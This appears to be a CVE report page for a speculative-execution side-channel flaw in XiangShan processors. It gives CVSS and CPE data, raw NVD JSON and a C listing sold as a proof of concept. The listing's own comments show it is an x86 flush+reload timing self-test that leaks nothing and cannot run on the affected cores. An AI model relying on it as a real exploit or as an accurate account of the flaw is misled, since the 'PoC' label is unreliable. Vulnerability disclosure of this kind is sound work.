Security Vulnerability Report
CVE-2025-63094 CVSS 7.5 HIGH

CVE-2025-63094

Published: 2025-12-10 18:16:21
Last Modified: 2026-01-02 21:23:36

Description

XiangShan Nanhu V2 and XiangShan Kunmighu V3 were discovered to use speculative execution and indirect branch prediction, allowing attackers to access sensitive information via side-channel analysis of the data cache.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:xiangshan:xiangshan:2.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:xiangshan:xiangshan:3.0:*:*:*:*:*:*:* - VULNERABLE
XiangShan Nanhu V2 < fixed version
XiangShan Kunmighu V3 < fixed version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-63094 PoC - XiangShan Speculative Execution Side-Channel Attack
// Based on research from https://github.com/necst/aca25-xiangshan-spectre
//
// Review note on what this listing actually does: every platform-specific
// piece below (<x86intrin.h>, _mm_clflush, __rdtsc) is x86-only, so this
// file cannot run on the RISC-V XiangShan cores the CVE describes. It also
// contains no speculative or out-of-bounds access: the "secret" is a global
// of this same process, read directly and architecturally, and every
// probe_array index is reduced modulo ARRAY_SIZE before use. What the code
// demonstrates is a flush+reload cache-timing self-test whose reported "hit"
// is produced by the program's own earlier in-bounds load (see
// attack_sequence), not by any information leak.
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <x86intrin.h>

// Number of distinct byte values; one probe_array slot per value.
#define ARRAY_SIZE 256
// Cycle count below which a timed load is reported as a cache hit. This is a
// hard-coded constant; whether 80 cycles separates hit from miss depends on
// the machine, and nothing in this file calibrates it.
#define CACHE_HIT_THRESHOLD 80

// Stand-in for the "victim" data. It is an ordinary global of this process,
// so reading it crosses no privilege or isolation boundary.
char secret_data[16] = "SECRET_KEY_123";

// Zeroed once in attack_sequence and never read afterwards; despite its name
// it plays no part in the measurement.
char training_array[ARRAY_SIZE * 512];

// Probe buffer: one 512-byte slot per possible byte value. Slots are flushed,
// touched, then timed.
volatile char probe_array[ARRAY_SIZE * 512];

// Evict the first byte of each 512-byte slot of probe_array from the cache.
// Note: _mm_clflush takes a 'const void *'; passing a 'volatile char *'
// discards the volatile qualifier, which compilers typically diagnose.
void flush_side_channel() {
    // Flush probe array from cache
    for (int i = 0; i < ARRAY_SIZE; i++) {
        _mm_clflush(&probe_array[i * 512]);
    }
}

// Time one architectural (non-speculative) load of probe_array slot
// malicious_x. Both callers pass a value already reduced modulo ARRAY_SIZE,
// so the access is in bounds. Returns the raw __rdtsc() delta around the
// load, in cycles.
size_t read_side_channel(size_t malicious_x) {
    size_t time1, time2;
    volatile char *addr;
    // Select the slot; the volatile qualifier makes the load below an
    // observable side effect, so the compiler must emit it.
    addr = &probe_array[malicious_x * 512];
    time1 = __rdtsc();
    *addr; // The timed load; it also brings this slot's line into the cache.
    time2 = __rdtsc();
    return time2 - time1;
}

// Run 1000 rounds of: flush probe_array, load the slots selected by the first
// ten secret bytes, then time a reload of the slot selected by secret_data[0].
// The inner loop's i == 0 iteration has already loaded exactly that slot, so
// the timed reload is expected to hit; the printed "leaked byte" is therefore
// just secret_data[0] % ARRAY_SIZE, which this code read directly.
void attack_sequence() {
    size_t training_index, malicious_index, result;
    // Initialize arrays
    memset((void*)training_array, 0, sizeof(training_array));
    memset((void*)probe_array, 0, sizeof(probe_array));
    printf("Starting XiangShan Speculative Execution Attack PoC\n");
    printf("Target secret: %s\n\n", secret_data);
    // Attack loop
    for (int iter = 0; iter < 1000; iter++) {
        // Evict all probe slots so only loads made below are cached.
        flush_side_channel();
        // No branch-predictor training happens here: there is no conditional
        // branch on the index, and the loads are in-bounds and architectural.
        for (int i = 0; i < 10; i++) {
            training_index = i & (ARRAY_SIZE - 1); // assigned, never read
            malicious_index = (secret_data[i % strlen(secret_data)] & 0xFF) % ARRAY_SIZE;
            // Direct in-bounds load of the slot for this secret byte; the
            // timing returned here is discarded.
            result = read_side_channel(malicious_index);
        }
        // Time the slot for secret_data[0]; it was loaded by i == 0 above.
        malicious_index = (secret_data[0] & 0xFF) % ARRAY_SIZE;
        result = read_side_channel(malicious_index);
        if (result < CACHE_HIT_THRESHOLD) {
            printf("Cache HIT detected at index: %zu\n", malicious_index);
            printf("Potential leaked byte value: %d\n", (int)malicious_index);
        }
    }
    printf("\nAttack completed. Check timing patterns for leaked data.\n");
}

// Print a banner, run attack_sequence(), and exit 0.
int main() {
    printf("========================================\n");
    printf("CVE-2025-63094 PoC - XiangShan Side-Channel\n");
    printf("========================================\n");
    attack_sequence();
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63094", "sourceIdentifier": "[email protected]", "published": "2025-12-10T18:16:20.707", "lastModified": "2026-01-02T21:23:35.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XiangShan Nanhu V2 and XiangShan Kunmighu V3 were discovered to use speculative execution and indirect branch prediction, allowing attackers to access sensitive information via side-channel analysis of the data cache."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-203"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xiangshan:xiangshan:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "01B90300-4ABC-464F-A54B-BF362E0A7FE3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:xiangshan:xiangshan:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "BDF2681F-76EE-4656-B34A-8B1DE9E21F87"}]}]}], "references": [{"url": "https://github.com/necst/aca25-xiangshan-spectre", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/necst/aca25-xiangshan-spectre/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}